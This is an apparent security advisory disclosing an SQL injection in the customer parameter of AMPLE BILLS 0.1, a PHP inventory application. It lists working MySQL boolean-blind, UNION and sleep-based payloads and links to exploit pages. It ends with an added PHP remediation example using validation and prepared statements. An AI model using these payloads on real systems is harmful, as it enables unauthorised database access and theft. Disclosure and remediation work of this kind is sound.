AMPLE BILLS 0.1 SQL injection
AMPLE BILLS version 0.1 suffers from a remote SQL injection vulnerability.
## Title: AMPLE BILLS 0.1 Multiple-SQLi
## Author: nu11secur1ty
## Date: 04/13/2024
## Vendor: https://www.mayurik.com/
## Software: https://www.sourcecodester.com/php/16741/free-and-open-source-inventory-management-system-php-source-code.html
## Reference: https://portswigger.net/web-security/sql-injection

## Description:
The customer parameter (#1*) appears to be vulnerable to SQL injection attacks. The payload (select*from(select(sleep(20)))a) was submitted in the customer parameter. The application took 20017 milliseconds to respond to the request, compared with 4 milliseconds for the original request, indicating that the injected SQL command caused a time delay. The database appears to be MySQL. The attacker can get all information from the system by using this vulnerability!

STATUS: HIGH- Vulnerability

[+]Payload:
```mysql
---
Parameter: #1* ((custom) POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: customer=(-2876) OR 5249=5249#from(select(sleep(20)))a)&issuedate=03/15/2024 - 04/13/2024

    Type: UNION query
    Title: MySQL UNION query (random number) - 1 column
    Payload: customer=(-8147) UNION ALL SELECT CONCAT(0x7178627671,0x456d507450425279564f614b766957634d464a6c63536e6f63464953467254446171427a754e5769,0x7176626271),7839,7839,7839,7839#from(select(sleep(20)))a)&issuedate=03/15/2024 - 04/13/2024
---
```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2023/AMPLE-BILLS-0.1)

## Proof and Exploit:
[href](https://www.nu11secur1ty.com/2024/04/ample-bills-01-multiple-sqli.html)

## Time spent:
01:15:00
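
## Remediation sketch (added example):
The following is an added example, not code from the advisory or from AMPLE BILLS: it shows how a handler for the `customer` and `issuedate` POST fields can validate both values strictly and bind them through a prepared statement. The function names, the `invoices` table and its columns are assumptions, and an in-memory SQLite database stands in for MySQL so the block runs offline.

```php
<?php
// Only the field names customer/issuedate come from the advisory; the
// function names and the invoices schema are assumed for illustration.
function parseReportFilter(array $post): array
{
    // customer must be a plain positive integer id, nothing else.
    $customer = filter_var($post['customer'] ?? null, FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 1]]);
    if ($customer === false) {
        throw new InvalidArgumentException('customer must be a positive integer');
    }
    // issuedate must be exactly "MM/DD/YYYY - MM/DD/YYYY".
    $range = $post['issuedate'] ?? '';
    if (!is_string($range)
        || !preg_match('#^(\d{2}/\d{2}/\d{4}) - (\d{2}/\d{2}/\d{4})$#D', $range, $m)) {
        throw new InvalidArgumentException('issuedate must be MM/DD/YYYY - MM/DD/YYYY');
    }
    $dates = [];
    foreach ([$m[1], $m[2]] as $raw) {
        $d = DateTimeImmutable::createFromFormat('!m/d/Y', $raw);
        // Round-trip check rejects overflow dates such as 13/45/2024.
        if ($d === false || $d->format('m/d/Y') !== $raw) {
            throw new InvalidArgumentException("invalid date: $raw");
        }
        $dates[] = $d->format('Y-m-d');
    }
    return [$customer, $dates[0], $dates[1]];
}

function fetchInvoices(PDO $db, array $post): array
{
    [$customer, $from, $to] = parseReportFilter($post);
    // Values travel as bound parameters and never become SQL text.
    $stmt = $db->prepare('SELECT id, customer_id, issue_date, total FROM invoices
         WHERE customer_id = :customer AND issue_date BETWEEN :from AND :to');
    $stmt->bindValue(':customer', $customer, PDO::PARAM_INT);
    $stmt->bindValue(':from', $from);
    $stmt->bindValue(':to', $to);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed demo data. With MySQL, use a mysql: DSN and set
// PDO::ATTR_EMULATE_PREPARES to false so binding happens server-side.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE invoices (id INTEGER PRIMARY KEY, customer_id INTEGER, issue_date TEXT, total REAL)');
$db->exec("INSERT INTO invoices VALUES (1, 7, '2024-03-20', 120.0), (2, 8, '2024-03-21', 80.0)");
$good = ['customer' => '7', 'issuedate' => '03/15/2024 - 04/13/2024'];
echo count(fetchInvoices($db, $good)), " row(s) for customer 7\n";
try {
    fetchInvoices($db, ['customer' => '(-2876) OR 5249=5249#'] + $good);
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), "\n";
}
```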